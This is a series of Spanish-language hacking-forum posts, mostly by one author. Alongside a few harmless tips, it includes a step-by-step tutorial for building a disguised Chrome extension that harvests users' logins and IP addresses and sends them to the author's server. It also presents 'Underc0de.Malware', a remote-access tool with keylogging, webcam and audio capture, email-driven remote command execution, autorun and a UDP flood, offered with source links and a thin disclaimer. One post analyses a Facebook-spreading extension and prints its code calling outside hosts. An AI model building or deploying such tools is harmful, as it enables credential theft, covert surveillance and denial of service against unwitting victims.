Hace ya varias semanas me encontraba inactivo a causa de un accidente pero eso no amilano al espíritu programador, asi que les vengo a compartir una buena página en la que se aprenderá desde lo mas easy hasta lo mas hard.


Cursos:

HTML & CSS
JavaScript
Python
Ruby
Jquery
Php
Apis
.... y muchos retos

Así de la misma manera que uno puede llegar a aprender , también puede armar sus propios cursos.
Los cursos son 100% prácticos.


Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Después de algunos días de inactividad, decidí compartirles una parte de mi vida diaria, donde me la paso casi un buen tiempo al despertar desde el Desktop..

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si ustedes tienen algunas no duden en compartirlas...!!

SAludos

Es el mismo problema de Bugtraq pero ahí solo arrancas el servicio con el panel de administración pero en el distro que estas utilizando aun no tuve la oportunidad de testearlo, usa esto si te sirve.

sudo apt-get remove virtualbox-\*
sudo apt-get purge virtualbox-\* o (sudo apt-get purge virtualbox-4.2)
sudo apt-get install virtualbox-4.2

Vera si te funciona ....!!

Saludos

ahí te paso algunas web que tal vez te sirvan para convertir de vb a c #.

// RandomSoft
MySqlConnection Con = new MySqlConnection("Aqui los datos de tu Base de Datos");
//variable dataset
DataSet Ds = new DataSet();
//variable tabla
DataTable Tabla = new DataTable();
//adaptador que sirve de enlace intermedio entre la aplicación y la
//base de datos
MySqlDataAdapter Da = new MySqlDataAdapter("SELECT * FROM Registro", Con);

//capturamos errores
if (Da.Fill(Ds)) {
	try {
		//ejecutamos la query que tiene el DataAdapter
		MySqlCommandBuilder Cmd = new MySqlCommandBuilder(Da);
		//llenamos la tabla
		Da.Fill(Tabla);
		//mostramos datos
		DataGridView1.DataSource = Tabla;

	} catch (MySqlException ex) {
		//en caso de error
		Interaction.MsgBox(ex.Message);

	} finally {

		//finalmente eliminamos objetos de memoria
		Con = null;
		Ds = null;
		Tabla = null;
		Da = null;

	}
} else {
	DataGridView1.DataSource = "";
	//MsgBox("No se encontró ningun tipo de información", MsgBoxStyle.Exclamation)
}

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Sos un capo! Te doy +Karma por el aporte. Y aclaro una cosa.. No importa que sean de backtrack, Kali trae las mismas tools, asique tambien sirven!

jkajkajka, me aclaraste esa duda XD
Gracias ANTRAX

Tiene toda la razon Antrax, ya que todas las distros de seguridad tienen tools en común...!!
Saludos

Hace unos días me tome un descanso y regrese a mis orígenes ... me tope con un material muy bueno para los que desean surfear por este mundo de la Seguridad Informática, aunque es algo básico-intermedio pero muestra el uso de las mayorías de las tools que cualquier distro de seguridad trae consigo .Para aquellos que empiezan a dar sus primeros pasos de seguro les ayudara a caminar.


ojo esta en ingles: Pero cuenta con imágenes así que si no se denomina ese idioma te podéis guiar con las capturas que en ella se encuentran.

URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

P.D.: Espero no que no encuentre en algún post si fuera así lo eliminare....

Si usas VPN date una vuelta por: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
o tambien esta bueno el SecurityKISS... aunq solo te deen 300mb.. (cuando lo utilizaba)
pero antes un poco de teo para que tengas tus propios centos si es lo mejor es proxy o VPN : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos..

Hice algunos testeos pero no llege a ofuscar el codigo, pero bueno se puede hacer redireciones aunque ya las visteYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login de esa manera haciendo inaccesible a la parte de extensiones de dicho navegador , la otra y no menos importante es darle la "flasa seguridad a victima".
Saludos

Al parecer esto se lo debo al dolor de cabeza que tuve ayer por la noche que hizo que me distrajera con alguna idea que se me salia de la imaginación  Como hace unas semanas vi un archivo javascript capaz de mostrar las contraseñas en forma local (escuchar al servidor) y en el nos arrojaba las contraseñas y el email.

Así que decidí ir por aquella imaginación que era tratar de enviar datos en forma remota:

1.- Primero se me paso por la cabeza que el javascript cree un archivo txt luego enviarlo, pero para crear un archivo txt un depende mucho de si es usuario que navega tiene los permisos suficiente Ademas no es lo mismo crear un txt linux-windows. Pero dije no es una loca idea.

2.-Segundo se me ocurrió enviar los datos via email. Pero como sabemos javascripit no es posible enviar , averigüé un poco mas que si se podía hacer mediante phpmailer pero dije bahh para eso necesito que hsoting tenga SSL ocorriento  443 , eso por que gmail-outlook necesita una conexión segura.

3.-Tercero pensé en enviar por el puerto 21 (FTP)para enviar los datos o sobre escribirlo  hice una conexión exitosa, pero como enviaba el archivo. Aunque con php si era posible pero lo que necesitaba era javascript... =(

function ftp_login(form) {
 var login = form.login.value;
 var pass= form.clave.value;
 var sererr = form.servidor.value;
 if (login && clave && servidor) {
 var ftp_connect = "ftp://" + login + ":" +pass + "@" + server;
 window.location = ftp_connect;
 }
 else {
 alert("=(No se conecto");
 }
 }

4.- Entonces dije si creo un zip el el que se guarde la contraseña y luego pueda enviarlo. Pero aun que sabia no era posible enviármelo al correo pero tal vez al FTP, puede llegar a crear un archivo zip pero con php e incluso podía enviar una imagen , uhmm entonces creí que tal vez podía enviar un screen, pero bueno sera para otra ocasión. Pero aquí esta el link con el cual se puede crear el archivo zip You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/

5.- Creo que las ideas se me acababan ya era las 3 a.m de la madrugada así que dije uhmmm me recode de XXS y dije EURECAAAAAAAAAAAA....!! Lo tenia...!!
Empecemos...!!
Bueno primero lo primero para crear el crx ( que es la extensión que tienen los complementos de Google Chrome) necesitamos 2 archivos el *.json y *.js (que es el javascript). En el *.json se encuentra la descripción del complemento . En mi caso fue lo siguiente: NO SE DEBE CAMBIAR EL NOMBRE" manifest.json"
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Por que esta en ingles pues cuando instales el complemento la mayoría cuando se encuentra en otro idioma solo le pones YES.. asi que mejor esta ese idioma ademas el titulo es resaltante OPTIMIZAR Google Ghrome "En otras palabras " Obtener tu user y pass ". Luego verán que dice chrome.js ese es el archivo Javascript.

Ahora editamos el chrome.js lo único que necesitas editar por nuestro hosting  "localhost" Reemplazan por el suyo.


el javascripit tiene que estar en tener el tipo de codificacion UTF-8. Luego de ello vamos chrome y  *.json y *.js debe encontrarse en una carpeta.

Una vez abierto Chrome se dirigen a Extensiones.


Cuando nos encontremos ahi das click en el checkbox de Modo Desarrollador y luego Empaquetar Extensión.


Ahora se dirigen a la carpeta en donde se encuentra el *.json y  *.js en mi caso es C:\Users\Administrador\Desktop\Optimize Google Chrome esa misma dirección colocamos en el siguiente popup.


Luego empaquetara la extensión de google chrome.


Para poder instalar la extensión necesitas agregar

--enable-easy-off-store-extension-install

a las propiedades del acceso de google chrome.


Eso seria lo único negativo =( ..!!

Seguimos ahora ya podemos colocar la dirección que nos arrojo el popup en mi caso C:\Users\Administrador\Desktop\Optimize Google Chrome.crx el cual colocamos en la barra de dirección.

Ahora ya esta el 90 % del trabajo hecho, ahora solo necesitamos subir al hosting el archivo guardar.php acompañado de un archivo datos.txt (datos.txt debe tener los permisos suficientes para ser modificados).



ese archivo junto con el datos.txt deben subirlo al host. Si todo resulto bien cuando se ingrese a una pagina los datos serán enviados a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login usan el DECODEURL para no colocar un pass o un user incorrecto
Con la extensión se puede obtener:
<ul>
   <li>Contraseñas /Usuario</li>
   <li>El lenguaje</li>
   <li>Protocolo por el cual se navega</li>
   <li>El proxy</li>
   <li>Obtenemos el puerto</li>
   <li>El agente (wap o web)-(S.O)-(Navegador aunque ya sabemos que es google Chrome)</li>
   <li>La dirección ala que se accede</li>
   <li>La fecha.</li>
   <li> Y por supuesto la IP pública (podemos acceder a su router si es que la contraseña la tiene por default)</li>
</ul>

Link de Descarga : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un AGRADECIMIENTO Especial a :
sh4r3m4n

Saludos

Le podes hacer un Research... para ello
1.- Empieza por analizar si hay actividades de red cosa que lo podes hacerlo con el monitor de recursos para poder ver si existe alguna conexión.
2.-Luego si existe alguna envió de data ten mucho cuidado ahora veras si existe un autorun services.msc (aun que es lo más lógico además fíjate el registro)
3.-Ahora lleno mas a fondo podes usar un Process Explorer para ver los dll asociados , el Net Ensamblado , recursos que consume , los bytes de data y entre otras más funciones muy buenas..
4.- Si eso es que note te sientes amigables con ello podes usar algo mucho más bueno.. a mi parecer me da la sensación de estar frente a un decompiler este es el dichoso Task Manager DeLuxe una vez que lo tengas en tu ordenador vas a la pestaña de Windows y le das check al invisible windows seguido te arrojara toda la información incluso algunos parámetros que pueden estar utilizando incluso los handles y modules.
5.-Ahora casi el antepenúltimo pero no menos importante monitoreas el tráfico con los datos ahí tendrás información importante hacia donde se va tus datos.
6.-Luego por ultimo si deseas ir mas a profundo puede usar el OllyDGB o IDA son muy buenos para ingeniería inversa, ahí podes ver el programa en lenguaje maquina , modificarlo y todo lo que tu imaginación lo permita... (Eso si es que el código no está ofuscado")

Saludos

Crei tenerlo todos pero ahora me doy cuenta que me faltaban algunos excelente Antrax
Saludos

En el navegador de Gogle Chrome el malware se encuentra en : C:\Users\"Uusario"\AppData\Local\Google\Chrome\User Data\Default\Extensions (en Windows 7)
Pues si lo eliminan directamente del navegador no se podra pues tiene redireciones al entrar a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login  al WebStore..!! Asique es mejor eliminarlo manualmente.

Lo interezante del complementoen Google  chrome posee una especie de "bypass" que hace al que se instale como si fuera del un complemento del WebStore (testeado en WinXp) pues no necesita la dichosa "--enable-easy-off-store-extension-install". algo que muy interesante.

Saludos...
atte.: CodePunisher

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
este proyecto está muy pero muy bueno, pero la frutilla del postre es el iconito de la manzana de apple xD

se agradece que lo aportes para underc0de.

saludos!

Aqui tienes la secuencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos...!![H]arkonnen
Gracias por el comentario. Aunque es el primero pero bueno. Ahora le agrege una nueva funcion de UDP flood...!! en unos cuantos minutos lo dare a conocer..
Saludos...[H]arkonne

genial, lo esperaremos con ansias

saludos!

Agregando mas funciones a nuestro "malware" underc0de.exe, En este caso tomamos en cuenta a un factor dentro de la seguridad denominado negación de servicio (denial of services), uno de los más usados en la actualidad que también constituye  parte de las etapas de un Ataque ("Pentestig") y que cada vez que escucho o leo el algún artículo se me viene a la mente "MafiaBoy" uno de los grandes ataques usando este método.
En qué consiste el Dos cada vez que uno accede a un sitio web envía cierta cantidad de paquetes de datos en los cueles se incluye información que será devuelta por el servidor, esa cantidad suele ser mínima de esa manera no afecta al redimiendo del host a quien va dirigido la consulta, pero en este caso si llegáramos a enviar grandes paquetes para saturarlo además de utilizar no solo un ordenador si múltiples en este caso sería una distribución de negación de servicio conocido como "DDOS" y de esa manera alertaríamos el tiempo de respuesta que suele ser ms "milésimas de segundo".
Hay muchos tipos de ataque usando flood, en este caso solo tome el concepto de uno de ellos llamado UPD Flood.

El UDP es un protocolo que corresponde a la capa de transporte juntamente con el TCP, DCCP ... en Esta se incluye a 2 componente el destinatario y el destino. El UDP utiliza los datagramas o bloques de información que contiene la información necesaria haciendo que la red solo lo dirija hacia su destino  peor en este caso hablando ya de UDP no necesita establecer conexión con el destinatario para el envió de datagramas ya que en la cabecera del paquete se encuentra la información necesaria para encontrar su destino. Y por consiguiente tampoco se tiene confirmación si se llego con excito o no el paquete.


UPD Flood: Es inundar con grandes cantidades de paquetes UDP enviados a host llegando a un puerto aleatorio o ya establecido. Cuando el datagrama llega a su destino el apquete ira akl pa que aplicación será dirigida, pero cuando no se encuentra que dicha aplicación que se encuentra en dicho puerto no requiere dicho paquete se generara el conocido Internet Control Message Protocol (notificación de errores) como por ejemplo cuando un host no esta disponible. Cuando se llegan enviar múltiples paquetes podemos hacer que el sistema deje de funcionar.
Para proteger de este tipo de ataques se puede utilizar un firewall o las diferentes tecnologías como IPS(Intrusion prevention system ), filtrar los paquetes UDP y sobre todo monitorear la red y sus servicios.
Con un poco de teoría pasamos a ver como funciona:

Se envia con los parámetros necesarios:

IP: direcion ip
PORT: puerto
PACK: tamaño del paquete
SOCK:Repeticion se incluira en un for previamente en el código


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
o tambien puedes usar el famoso "namp"

un previo Testeo:


VER:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Link de Codigo Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Link del Decryter You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Link de ILMergeYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Link de myIp.php You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Underc0de.exe es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que curren
cuando un malware infecta a los ordenadores. No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco me hago responsable de las copias del proyecto que sean distribuidas a través de otras website o usuarios y que puedan haber sido modificadas con intenciones dudosas.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
este proyecto está muy pero muy bueno, pero la frutilla del postre es el iconito de la manzana de apple xD

se agradece que lo aportes para underc0de.

saludos!

Gracias por el comentario. Aunque es el primero pero bueno. Ahora le agrege una nueva funcion de UDP flood...!! en unos cuantos minutos lo dare a conocer..
Saludos...[H]arkonne

El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las  etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات  y según google es Persa... que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta www.xn--mgbaaaaaaaaydd5fee22afff.xn--mgbaam7a8h  WDF...!! Pero seguí mas adelante tome la dirección www.sosyalpaket.net  al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:

var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"}
else
if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"}
else
if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"}
else
{var inst="http://www.sosyalpaket.net/chrome.php"}

Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.

Con el siguiente mensaje:

Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.


Lo que me dio risa fue ese mensaje de "Debido a los errores del sistema y vulnerabilidades de seguridad" jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.


Y encontré algo que me resulto familiar

if(location.hostname.indexOf("facebook.com") >= 0){

addJavascript('http://sosyalpaket.net/yeni.php');

addJavascript('http://fbmedyahizmetleri.com/bakgel.php');

addJavascript('http://facebookhizmetlerim.com/user.php');

}

En el user.php me tope con:

"https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.


Lo más razonable es eliminarlo.
Saludos

Probaste ello: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
o si usas repositorios bueno creo q seria el winusb

sudo add-apt-repository ppa:colingille/freshlight
sudo apt-get update
sudo apt-get install winusb

otro aparte de estas 2  tools no he tenido la oportunidad de usar otras...!

Saludos...!!

Se ha solucionado un pequeño error.

Saludos

Este artículo lo tenía guardado y por falta de tiempo no lo di a conocer, hace una par de semanas para ser exactos creo que fueron 2 publique un artículo que se tratada sobre un "Mouselogger" (denominado así pues capturada los click en determinados procesos), pero esta vez les traigo algo un poco más complejo bueno por así decirlo este. A comparación del lo publicado hace semanas este no captura las coordenadas de los click que se realizan si no por otro lado captura el imágenes de la webcam, grabaciones, envió de código a la terminal y por su puesto el infaltable log del teclado. Eso está incluido en la versión alfa pues puede llegar a salir a la luz los infaltables errores. Pero por  el momento es todo ello lo que nos puede ofrecer la pequeña aplicación que es este caso lleva el nombre de "Underc0de.Malware".

Una Captura del Solution Explorer:


Cada proceso que a realizar se encuentra en una carpeta especifica, para así de esa manera tener más orden. Empecemos a explicar un poco el código y como se ejecuta:

        Keylogger_CreateTxt.load()

        Move_Exe_Ejecutarse.MoverExe() 

        Autorun.Autorun()
        
        BuscarDispositivos()

        CreateCarpeta.Carpeta()
      
        Systeminfo.DatumPc()
      
        Intervalo_Pop.Timeejecutar(Intervalo_Pop.tiempototal)

1.- Como se ve el primero en ejecutar es la creación de la carpeta pues será esa el nido de nuestro malware
2.- Lo siguiente será mover nuestro exe a dicho carpeta creada
3.- Se ejecutara el autorun
4.- Busca un dispositivo de CamWeb
5.- Realiza ya comprobación para conocer la IP pública, IP privada y el nombre de la PC.
6.- Se ejecuta el intervalo de comprobación POP

Hay un Modulo

Config_General 

en el cual se encuentra parámetros como el Email, ubicación de Carpetas, tiempo de verificación de POP, Webcam, Log del teclado, Rec Audio,Capture Pantalla y el Terminal. Si se decide cambiar parámetros es en ese modulo donde se debe reemplazar con el valor que usted desea.


Si llega un mensaje del destinatario al que se enviara el mensaje:

    Public Config_Para As String = "[email protected]"

NOTA: El mensaje que se envía debe ser el mismo al que se enviara el mensaje. Para así otras personas que envían el parametro de un correo diferente el programa los desconosca.
Esto son las variables que reconoce el programa cuando se envía

            Dim ComanPantalla As String = "Pantalla"
            Dim ComanWebcam As String = "WebCam"
            Dim RecAudio As String = "RecAudio"
            Dim Terminal As String = "Terminal"
            Dim Keylogger As String = "Keylogger"

Estos variables deben estar en el Asunto


Eso sucederá para Captura de Pantalla, Webcam y Keylogger. Pero a diferencia del Terminal(que lo denomine así al Consola de Windows) en Asunto sería diferente.


La forma de escribirlo en la consola de Win seria: ipconfig /all , el espacio lo he reemplazado por los ":" dos puntos, pero si solo se quiere enviar un consulta sin argumento sería de la siguiente manera:


En este caso después de los dos puntos se encontrara vacio. Pero se debe colocar necesariamente los ":" sin espacio alguno al final.

Mientras para RECAUDIO el intervalo que tu coloques:

#Region "Tiempo Verificacion POP"
    Public Tiempo_Verificacion_POP As Integer = 6 'intervalo de 6 minutos para la consulta POP
#End Region

no debe ser mayor al numero de grabación ( en la siguiente version lo solucionare), para la grabación debe ser de la siguiente manera:

"1" es el tiempo de grabación si deseamos que grabe 2 minutos pero sin llegar a serl el valor de la consulta pop, seria: RecAudio 2 (esto debe ir en asunto)

Como vemos esta line de código

    Public Function GETIP()
        Dim req As HttpWebRequest = WebRequest.Create("http://localhost/myIp.php")
        Dim res As HttpWebResponse = req.GetResponse()
        Dim Stream As IO.Stream = res.GetResponseStream()
        Dim sr As StreamReader = New StreamReader(Stream)
        Return (sr.ReadToEnd())

    End Function

que se encuetra en

 Module Systeminfo

debemos subir un archivo para lograr dicha consulta de manera que nos arroje la ip para ello lo subimos a cualquier hosting.


que se encuentra en:
Ya que el programa necesitas dll para el POP y la WebCam.


Tenemos que fusionarlos (unirlos con el exe) para así tengamos solo un archivo. Para ello será necesario de una tools muy buena ILMerge.
1.- Llevamos a una carpeta los 3 dll mas el exe y un el archivo bat (el cual dejare el link).


2.- Luego vamos a la consola y nos vamos a la ubicación de la carpeta, colocamos lo siguiente.



Seguido nos mostrara el archivo unido.

El archivo bat

C:\Users\Code\Desktop\Underc0de\ILMerge.exe /target:Winexe /out:underC0de2.exe underc0de.exe OpenPop.dll AForge.Video.DirectShow.dll AForge.Video.dll

Link de Codigo Fuente Underc0de.malware.exe :You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
